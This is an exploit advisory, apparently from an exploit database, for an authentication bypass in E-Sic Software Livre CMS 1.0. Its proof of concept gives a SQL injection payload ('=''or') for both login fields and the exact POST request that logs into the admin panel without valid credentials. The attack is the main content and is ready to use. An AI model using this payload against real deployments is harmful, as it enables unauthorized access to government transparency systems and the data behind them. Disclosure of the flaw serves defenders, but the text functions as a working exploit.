16 lines
No EOL
794 B
Text
16 lines
No EOL
794 B
Text
# Exploit Title: E-Sic Software livre CMS - Autentication Bypass#
|
|
Date: 12/10/2017# Exploit Author: Elber Tavares# Vendor Homepage:
|
|
https://softwarepublico.gov.br/# Version: 1.0# Tested on: kali linux,
|
|
windows 7, 8.1, 10 - Firefox# Download
|
|
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
|
|
More informations:
|
|
http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html
|
|
|
|
The vulnerability is in the login area of e-sic,
|
|
where we can enter the panel only using some parameters such as
|
|
username and password
|
|
---------------------------------------------------------------------
|
|
PoC:
|
|
Url: http://vulnsite/esic/index/ User: '=''or' Pass: '=''or'
|
|
POST: http://vulnsite/esic/index/index.php
|
|
DATA: login=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btsub=Entrar |